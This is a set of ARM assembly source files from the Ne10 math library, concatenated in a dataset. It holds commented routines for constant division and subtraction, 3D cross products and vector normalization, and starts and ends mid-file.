vmla.f32 q5, q3, q3
bgt .L_mainloop_vec4 @ loop while r2 > 0, i.e. at least another 4 vectors (16 floats) remain
.L_mainloopend_vec4:
@ the last iteration for this call
@ reciprocal sqrt of the last sums (one Newton-Raphson step)
vrsqrte.f32 q6, q5
vmul.f32 q4, q5, q6
vrsqrts.f32 q4, q4, q6
vmul.f32 q4, q6, q4
@ normalize the components
vmul.f32 q0, q0, q4
vmul.f32 q1, q1, q4
vmul.f32 q2, q2, q4
vmul.f32 q3, q3, q4
vst4.32 {d0, d2, d4, d6}, [r0]!
vst4.32 {d1, d3, d5, d7}, [r0]!
.L_check_vec4:
@ check if anything is left to process at the end of the input array
cmp r3, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last (count % 4) vectors one at a time
vld4.f32 {d0[0], d2[0], d4[0], d6[0]}, [r1]! @ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
@ q3 = { V.w, -, -, - };
subs r3, r3, #1
@ calculate sum of squares of the components
vmul.f32 q4, q0, q0 @ V.x^2
vmla.f32 q4, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q4, q2, q2 @ V.x^2 + V.y^2 + V.z^2
vmla.f32 q4, q3, q3 @ V.x^2 + V.y^2 + V.z^2 + V.w^2
@ reciprocal sqrt (one Newton-Raphson step)
vrsqrte.f32 q5, q4
vmul.f32 q6, q4, q5
vrsqrts.f32 q6, q6, q5
vmul.f32 q6, q5, q6
@ normalize the components
vmul.f32 q0, q0, q6
vmul.f32 q1, q1, q6
vmul.f32 q2, q2, q6
vmul.f32 q3, q3, q6
vst4.32 {d0[0], d2[0], d4[0], d6[0]}, [r0]! @ store the normalized vector
bgt .L_secondloop_vec4
.L_return_vec4:
@ restore callee-saved q4-q6 and return NE10_OK
vpop {d8-d13}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,791 | modules/math/NE10_divc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_divc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_divc_float_asm
.thumb
.thumb_func
ne10_divc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Divides each float in src[] by the constant cst: dst[i] = src[i] / cst.
@
@ arm_result_t ne10_divc_float(arm_float_t * dst,
@                 arm_float_t * src, const arm_float_t cst,
@                 unsigned int count)
@
@  r0: *dst
@  r1: *src
@  r2: cst (a by-value float in a core register, softfp AAPCS —
@      the vmov below treats r2 as the float's bit pattern, not a
@      pointer; the original header comment's "arm_float_t *" was a
@      copy-paste error)
@  r3: int count, used as the loop counter
@
@  r5: current item's offset into both src[] and dst[]
@  r6: current source item's address, r1 + r5
@  r7: current destination item's address, r0 + r5
@
@ Returns NE10_OK in r0.
@ r4 is saved/restored alongside r5-r7 to keep the 8-byte stack
@ alignment required by AAPCS at public interfaces.
@
@ Fix vs. original: "vmov s3, r2" is loop-invariant (r2 never changes)
@ and has been hoisted out of the loop.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat @ nothing to do for count == 0
vmov s3, r2 @ s3 = cst (hoisted: constant for the whole loop)
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vdiv.f32 s10, s1, s3 @ s10 = src[i] / cst
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into main memory
add r5, r5, #4 @ Increase the offset by sizeof(float)
subs r3, r3, #1 @ Count down (i--)
bne .LoopBeginFloat @ Continue while items remain
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_divc_vec2f_asm
.thumb
.thumb_func
ne10_divc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise division of 2D vectors by one constant vector:
@   dst[i].x = src[i].x / cst->x;  dst[i].y = src[i].y / cst->y
@
@ arm_result_t ne10_divc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; x/y are reloaded from it on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec2F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r2, #0] @ s3 = cst->x
vldr s4, [r2, #4] @ s4 = cst->y
vdiv.f32 s10, s1, s3 @ s10 = src[i].x / cst->x
vdiv.f32 s11, s2, s4 @ s11 = src[i].y / cst->y
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
add r5, r5, #8 @ advance the offset by 2*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec2F @ loop while items remain (r3 != 0)
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_divc_vec3f_asm
.thumb
.thumb_func
ne10_divc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise division of 3D vectors by one constant vector:
@   dst[i].{x,y,z} = src[i].{x,y,z} / cst->{x,y,z}
@
@ arm_result_t ne10_divc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; components are reloaded on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec3F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r6, #8] @ s3 = src[i].z
vldr s4, [r2, #0] @ s4 = cst->x
vldr s5, [r2, #4] @ s5 = cst->y
vldr s6, [r2, #8] @ s6 = cst->z
vdiv.f32 s10, s1, s4 @ s10 = src[i].x / cst->x
vdiv.f32 s11, s2, s5 @ s11 = src[i].y / cst->y
vdiv.f32 s12, s3, s6 @ s12 = src[i].z / cst->z
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
vstr s12, [r7, #8] @ dst[i].z = s12
add r5, r5, #12 @ advance the offset by 3*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec3F @ loop while items remain (r3 != 0)
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_divc_vec4f_asm
.thumb
.thumb_func
ne10_divc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise division of 4D vectors by one constant vector:
@   dst[i].{x,y,z,w} = src[i].{x,y,z,w} / cst->{x,y,z,w}
@
@ arm_result_t ne10_divc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; components are reloaded on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec4F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r6, #8] @ s3 = src[i].z
vldr s4, [r6, #12] @ s4 = src[i].w
vldr s5, [r2, #0] @ s5 = cst->x
vldr s6, [r2, #4] @ s6 = cst->y
vldr s7, [r2, #8] @ s7 = cst->z
vldr s8, [r2, #12] @ s8 = cst->w
vdiv.f32 s10, s1, s5 @ s10 = src[i].x / cst->x
vdiv.f32 s11, s2, s6 @ s11 = src[i].y / cst->y
vdiv.f32 s12, s3, s7 @ s12 = src[i].z / cst->z
vdiv.f32 s13, s4, s8 @ s13 = src[i].w / cst->w
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
vstr s12, [r7, #8] @ dst[i].z = s12
vstr s13, [r7, #12] @ dst[i].w = s13
add r5, r5, #16 @ advance the offset by 4*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec4F @ loop while items remain (r3 != 0)
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_invmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_invmat.asm.s
@
|
open-vela/external_Ne10 | 9,791 | modules/math/NE10_subc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_subc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_subc_float_asm
.thumb
.thumb_func
ne10_subc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Subtract the scalar constant cst from every float in src[]:
@   dst[i] = src[i] - cst, for i in [0, count)
@
@ NOTE(review): the first parameter below is presumably
@ "arm_float_t * dst" - "arm_vec2f_t *" looks like a copy/paste
@ leftover from the vec2 variant; confirm against the public header.
@
@ arm_result_t ne10_subc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst - the scalar constant itself, passed by VALUE (see the
@     "vmov s3, r2" below; r2 is never dereferenced)
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginFloat:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i]
vmov s3, r2 @ s3 = cst (reinterpret the bits held in r2 as a float)
vsub.f32 s10, s1, s3 @ s10 = src[i] - cst
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i] = s10
add r5, r5, #4 @ advance the offset by 1*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginFloat @ loop while items remain (r3 != 0)
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_subc_vec2f_asm
.thumb
.thumb_func
ne10_subc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise subtraction of one constant 2D vector:
@   dst[i].x = src[i].x - cst->x;  dst[i].y = src[i].y - cst->y
@
@ arm_result_t ne10_subc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; x/y are reloaded from it on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec2F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r2, #0] @ s3 = cst->x
vldr s4, [r2, #4] @ s4 = cst->y
vsub.f32 s10, s1, s3 @ s10 = src[i].x - cst->x
vsub.f32 s11, s2, s4 @ s11 = src[i].y - cst->y
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
add r5, r5, #8 @ advance the offset by 2*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec2F @ loop while items remain (r3 != 0)
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_subc_vec3f_asm
.thumb
.thumb_func
ne10_subc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise subtraction of one constant 3D vector:
@   dst[i].{x,y,z} = src[i].{x,y,z} - cst->{x,y,z}
@
@ arm_result_t ne10_subc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; components are reloaded on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec3F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r6, #8] @ s3 = src[i].z
vldr s4, [r2, #0] @ s4 = cst->x
vldr s5, [r2, #4] @ s5 = cst->y
vldr s6, [r2, #8] @ s6 = cst->z
vsub.f32 s10, s1, s4 @ s10 = src[i].x - cst->x
vsub.f32 s11, s2, s5 @ s11 = src[i].y - cst->y
vsub.f32 s12, s3, s6 @ s12 = src[i].z - cst->z
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
vstr s12, [r7, #8] @ dst[i].z = s12
add r5, r5, #12 @ advance the offset by 3*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec3F @ loop while items remain (r3 != 0)
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_subc_vec4f_asm
.thumb
.thumb_func
ne10_subc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Component-wise subtraction of one constant 4D vector:
@   dst[i].{x,y,z,w} = src[i].{x,y,z,w} - cst->{x,y,z,w}
@
@ arm_result_t ne10_subc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst - pointer; components are reloaded on every iteration
@ r3: int count, reused as the loop counter (counts down to 0)
@
@ r5: current item's byte offset into both src[] and dst[]
@ r6: current source item's address, base(r1) + offset(r5)
@ r7: current destination item's address, base(r0) + offset(r5)
@
@ r4 is saved/restored although unused - presumably to keep the stack
@ 8-byte aligned per the AAPCS (TODO confirm).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F @ nothing to do when count == 0
mov r5, #0 @ offset = 0
.LoopBeginVec4F:
add r6, r1, r5 @ r6 = &src[i]
vldr s1, [r6, #0] @ s1 = src[i].x
vldr s2, [r6, #4] @ s2 = src[i].y
vldr s3, [r6, #8] @ s3 = src[i].z
vldr s4, [r6, #12] @ s4 = src[i].w
vldr s5, [r2, #0] @ s5 = cst->x
vldr s6, [r2, #4] @ s6 = cst->y
vldr s7, [r2, #8] @ s7 = cst->z
vldr s8, [r2, #12] @ s8 = cst->w
vsub.f32 s10, s1, s5 @ s10 = src[i].x - cst->x
vsub.f32 s11, s2, s6 @ s11 = src[i].y - cst->y
vsub.f32 s12, s3, s7 @ s12 = src[i].z - cst->z
vsub.f32 s13, s4, s8 @ s13 = src[i].w - cst->w
add r7, r0, r5 @ r7 = &dst[i]
vstr s10, [r7, #0] @ dst[i].x = s10
vstr s11, [r7, #4] @ dst[i].y = s11
vstr s12, [r7, #8] @ dst[i].z = s12
vstr s13, [r7, #12] @ dst[i].w = s13
add r5, r5, #16 @ advance the offset by 4*sizeof(float)
subs r3, r3, #1 @ i--
bne .LoopBeginVec4F @ loop while items remain (r3 != 0)
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 5,357 | modules/math/NE10_cross.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_cross.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_cross_vec3f_neon
.thumb
.thumb_func
ne10_cross_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ NEON-accelerated 3D cross product:
@   dst[i] = src1[i] x src2[i], for i in [0, count)
@
@ arm_result_t ne10_cross_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: count >> 2 - number of chunks of 4 vectors (main loop)
@ r4: count & 3  - leftover vectors handled one at a time first
@     (NOTE: "asr" assumes count < 2^31 - TODO confirm acceptable)
@
@ Returns NE10_OK (0) in r0.
@
@ BUGFIX(review): the main loop used to pre-load the NEXT chunk of
@ input before testing the loop counter, reading up to 48 bytes past
@ the end of each source array on the final iteration - a potential
@ fault at a page boundary. Loads now happen at the top of the loop,
@ so only chunks that are actually processed are read.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; residual-loop trip count
asr r3, r3, #2 @ r3 = count / 4; main-loop trip count
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the leftover vectors one at a time, using lane 0 only
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ d0[0]=V1.x d2[0]=V1.y d4[0]=V1.z
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ d1[0]=V2.x d3[0]=V2.y d5[0]=V2.z
subs r4, r4, #1
@ cross product: (y1*z2 - z1*y2, z1*x2 - x1*z2, x1*y2 - y1*x2)
vmul.f32 d20, d2, d5 @ d20 = V1.y * V2.z
vmul.f32 d21, d4, d1 @ d21 = V1.z * V2.x
vmul.f32 d22, d0, d3 @ d22 = V1.x * V2.y
vmls.f32 d20, d3, d4 @ d20 -= V2.y * V1.z  -> result.x
vmls.f32 d21, d5, d0 @ d21 -= V2.z * V1.x  -> result.y
vmls.f32 d22, d1, d2 @ d22 -= V2.x * V1.y  -> result.z
vst3.32 {d20[0], d21[0], d22[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
.L_mainloop_vec3:
@ load the current chunk of 4 vectors from each source
vld3.32 {d0, d2, d4}, [r1]! @ q0 = x1, q1 = y1, q2 = z1 (4 lanes each)
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d26, d28, d30}, [r2]! @ q13 = x2, q14 = y2, q15 = z2
vld3.32 {d27, d29, d31}, [r2]!
@ four cross products at once
vmul.f32 q10, q1, q15 @ q10 = y1 * z2
vmul.f32 q11, q2, q13 @ q11 = z1 * x2
vmul.f32 q12, q0, q14 @ q12 = x1 * y2
vmls.f32 q10, q14, q2 @ q10 -= y2 * z1  -> result.x
vmls.f32 q11, q15, q0 @ q11 -= z2 * x1  -> result.y
vmls.f32 q12, q13, q1 @ q12 -= x2 * y1  -> result.z
@ store the 4 results, interleaving x/y/z back into memory
vst3.32 {d20, d22, d24}, [r0]!
vst3.32 {d21, d23, d25}, [r0]!
subs r3, r3, #1
bgt .L_mainloop_vec3 @ loop while chunks remain (r3 > 0)
.L_return_vec3:
@ return NE10_OK
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 1,605 | modules/math/NE10_dot.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
